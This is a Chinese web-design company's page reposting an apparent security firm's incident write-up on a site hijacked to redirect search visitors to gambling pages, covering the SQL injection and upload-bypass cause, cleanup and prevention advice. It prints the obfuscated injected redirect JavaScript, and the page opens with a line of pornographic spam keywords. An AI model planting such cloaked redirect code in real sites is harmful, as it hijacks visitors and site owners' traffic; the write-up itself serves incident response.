亚洲精品国产综合久久久久紧,久久99精品久久久久久清纯,人妻无码一区二区三区在线,ぱらだいす天堂中文网WWW

聯(lián)
咨詢熱線:

185-9527-1032

聯(lián)系QQ:

2863379292

官方微信:

網(wǎng)站標(biāo)題被篡改成北京賽車、PK10的解決處理辦法

建站經(jīng)驗

導(dǎo)讀:客戶網(wǎng)站于近日被跳轉(zhuǎn)到賭博網(wǎng)站,打開后直接跳轉(zhuǎn)到什么北京賽車,pK10等內(nèi)容的網(wǎng)站上去,客戶網(wǎng)站本身做了百度的推廣,導(dǎo)致所有訪問用戶都跳轉(zhuǎn)到賭博網(wǎng)站上去,給客戶帶來很大的經(jīng)濟(jì)

發(fā)表日期:2019-06-08

文章編輯:興田科技

瀏覽次數(shù):10028

標(biāo)簽:

客戶網(wǎng)站于近日被跳轉(zhuǎn)到賭博網(wǎng)站,打開后直接跳轉(zhuǎn)到什么北京賽車,pK10等內(nèi)容的網(wǎng)站上去,客戶網(wǎng)站本身做了百度的推廣,導(dǎo)致所有訪問用戶都跳轉(zhuǎn)到賭博網(wǎng)站上去,給客戶帶來很大的經(jīng)濟(jì)損失,再一個官方網(wǎng)站的形象也受到了影響。我們SINE安全對客戶網(wǎng)站進(jìn)行檢查發(fā)現(xiàn),客戶網(wǎng)站的標(biāo)題TDK被反復(fù)篡改成(北京賽車pK10等內(nèi)容)立刻對該客戶網(wǎng)站的安全,進(jìn)行全面的源代碼安全審計以及網(wǎng)站漏洞檢測與網(wǎng)站漏洞修復(fù),檢查了客戶的首頁標(biāo)題TDK內(nèi)容確實是被篡改,并添加了一些加密的惡意代碼,代碼如下:

type="text/java"eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c]);return p;}('m["9d1lian0"]["8460a"]('h314620 0k2ae70aq05gbfb3146207 341e7o0023p55888c129b3rc1di599f62cg37jh5314620j');',28,28,'x74|x63|x70|x73|x72|x2f|x69|x22|x77|x64|x65|x61|x2e|x6f|x3d|x76|x6a|x3c|x6d|x3e|x79|x75|window|x6e|x68|x3a|x78|x38'.split('|'),0,{}))

上述網(wǎng)站代碼是ASCII編碼,只要轉(zhuǎn)換成Unicode編碼,就可以看到加密的真實內(nèi)容。我們工程師對代碼進(jìn)行解讀,發(fā)現(xiàn)該代碼寫的是根據(jù)搜索引擎作為判斷條件進(jìn)行跳轉(zhuǎn)的代碼,通俗來講就是說,該代碼只針對搜索引擎,網(wǎng)站管理員直接輸入網(wǎng)址并不會發(fā)現(xiàn)網(wǎng)站跳轉(zhuǎn)到賭博內(nèi)容網(wǎng)站上去,客戶的網(wǎng)站通過百度或搜狗搜索會直接跳轉(zhuǎn)到這個北京賽車、pk10的網(wǎng)站上去。

針對于上述的問題,我們立即刪除加密的跳轉(zhuǎn)代碼,先將客戶網(wǎng)站損失降到最低,促使網(wǎng)站正常訪問(因為客戶一直在做百度推廣,一直在燒錢),通過一系列的安全檢測,網(wǎng)站到底是因為那些漏洞被上傳木馬,并篡改網(wǎng)站首頁的呢?經(jīng)過我們Sine安全工程師對網(wǎng)站代碼的詳細(xì)的安全檢測后,發(fā)現(xiàn)該網(wǎng)站系統(tǒng)存在SQL注入漏洞,導(dǎo)致攻擊者可以獲取到管理員賬戶和密碼,而網(wǎng)站后臺的地址用的也是默認(rèn)的admin目錄名,致使黑客獲取密碼后,直接登錄網(wǎng)站后臺,在對網(wǎng)站后臺安全檢測的時候,發(fā)現(xiàn)產(chǎn)品圖片上傳功能,存在繞過格式上傳腳本木馬的漏洞。

該網(wǎng)站漏洞產(chǎn)生于網(wǎng)站后臺的產(chǎn)品上傳頁面代碼中的$this->getext($filear["name"]); //取得擴(kuò)展名$this->set_savename($file); //設(shè)置保存文件名,這個代碼對文件擴(kuò)展名可以直接繞過并上傳php格式的腳本文件,從而讓攻擊者輕易取得網(wǎng)站的權(quán)限??蛻暨€反映說,網(wǎng)站經(jīng)常被反復(fù)的篡改,導(dǎo)致跳轉(zhuǎn)到賭博網(wǎng)站,找了網(wǎng)站建設(shè)的公司,他們也只是刪除掉代碼,沒過多久就又被篡改跳轉(zhuǎn)了,導(dǎo)致客戶網(wǎng)站損失嚴(yán)重,發(fā)生篡改跳轉(zhuǎn)的根本原因就是網(wǎng)站有漏洞,如果沒有修復(fù)好網(wǎng)站漏洞,即使刪除掉惡意代碼也只是表面上的工作,不起作用的還是會被反復(fù)篡改,于事無補(bǔ),亡羊補(bǔ)牢一樣。需要對網(wǎng)站進(jìn)行安全檢測,以及網(wǎng)站漏洞檢測,并修復(fù)好網(wǎng)站漏洞,清除木馬后門,網(wǎng)站安全部署好,才會使網(wǎng)站更加的安全穩(wěn)定運(yùn)行。

網(wǎng)站漏洞修復(fù)的處理過程如下:

對客戶網(wǎng)站源代碼進(jìn)行安全加固以及防止sql注入的前端過濾代碼,網(wǎng)站的后臺目錄安全設(shè)置,更改admin文件名為@#%admin,對網(wǎng)站后臺圖片上傳功能代碼進(jìn)行漏洞修復(fù),設(shè)置上傳文件白名單機(jī)制,以及文件上傳的目錄進(jìn)行了腳本安全權(quán)限設(shè)置,禁止進(jìn)行腳本,對上傳的文件擴(kuò)展也進(jìn)行了深入的安全過濾,網(wǎng)站的數(shù)據(jù)庫安全部署,對數(shù)據(jù)庫的連接信息進(jìn)行加密,刪除root管理權(quán)限,設(shè)置普通數(shù)據(jù)庫賬號,讀寫分離,新建表,查詢表,寫入表等數(shù)據(jù)庫正常操作權(quán)限,網(wǎng)站后臺的賬號密碼設(shè)置的復(fù)雜一些,密碼為12位數(shù)字+字母+大小寫組合,從發(fā)現(xiàn)網(wǎng)站漏洞到目前解決問題中,共查找到腳本木馬3個(webshell),一句話小馬后門2個,發(fā)現(xiàn)網(wǎng)站的模板內(nèi)容也被篡改了,導(dǎo)致客戶生成首頁的時候隨之也被加了惡意加密的代碼。

網(wǎng)站安全預(yù)防措施:

1.盡量避免網(wǎng)站后臺的默認(rèn)名稱如admin manage houtai

2.對網(wǎng)站上傳目錄的權(quán)限進(jìn)行控制。(設(shè)置無腳本執(zhí)行權(quán)限)

3.網(wǎng)站后臺的用戶名和密碼設(shè)置復(fù)雜點(diǎn),數(shù)字+字母+大小寫+特殊符號組合。

4.阿里云虛擬主機(jī)用戶的FTp賬號密碼要設(shè)置復(fù)雜點(diǎn),數(shù)字+字母+大小寫+特殊符號組合。

5.如果是單獨(dú)服務(wù)器的客戶,建議先把服務(wù)器的安全部署好,對每個網(wǎng)站的文件夾進(jìn)行安全部署,數(shù)據(jù)庫安全部署,,再做網(wǎng)站的安全,否則你網(wǎng)站再安全,服務(wù)器不安全也是于事無補(bǔ)。如果對安全不是太懂的話,建議找專業(yè)的網(wǎng)站安全公司去處理解決。

本文來源:A5

相關(guān)推薦

更多新聞

  • 11-10

    2020

    建站經(jīng)驗 / 2020-11-10

    【干貨分享】淺談企業(yè)自助網(wǎng)站建設(shè)的利與弊 !

      關(guān)于網(wǎng)站建設(shè),DIY自助建站工具(站長工具),主要是通過使用模板和內(nèi)容管理系統(tǒng)來建設(shè)及更新網(wǎng)站。使得網(wǎng)站建設(shè)與維護(hù)都變得容易起來。許多主機(jī)服務(wù)提供商都

    View details

  • 11-10

    2020

    建站經(jīng)驗 / 2020-11-10

    不得不知網(wǎng)站建設(shè)能為企業(yè)帶來什么?

      關(guān)于網(wǎng)站建設(shè),企業(yè)網(wǎng)站的作用更類似于企業(yè)在報紙和電視上所做的宣傳企業(yè)本身及品牌的廣告。不同之處在于企業(yè)網(wǎng)站容量更大,企業(yè)可以把任何想讓客戶及公

    View details

  • 5-30

    2020

    建站經(jīng)驗 / 2020-05-30

    如何策劃一場活動?(創(chuàng)意篇)

    小張是一家攝影公司的新媒體運(yùn)營, 老板要他策劃一個活動,目的是吸引更多的粉絲和完成一定的付費(fèi)轉(zhuǎn)化。 小張該怎么做呢?在日常工作中, 策劃一場活動主要分為兩個部分創(chuàng)造(創(chuàng)意)和

    View details

  • 8-23

    2023

    建站經(jīng)驗 / 2023-08-23

    東平網(wǎng)站建設(shè)- 為您的業(yè)務(wù)提供全方位的在線展示和營銷工具

    無論您是剛剛起步的創(chuàng)業(yè)公司還是已經(jīng)成熟的企業(yè),東平網(wǎng)站建設(shè)都是一個重要且不可忽視的環(huán)節(jié)。通過選擇合適的網(wǎng)站建設(shè)服務(wù)供應(yīng)商,并遵循最佳的數(shù)字營銷策略,您可以將網(wǎng)站打造成一個全方位的在線展示和營銷工具,為您的業(yè)務(wù)發(fā)展提供強(qiáng)大的支持。立即行動,將您的業(yè)務(wù)帶入數(shù)字化的未來!

    View details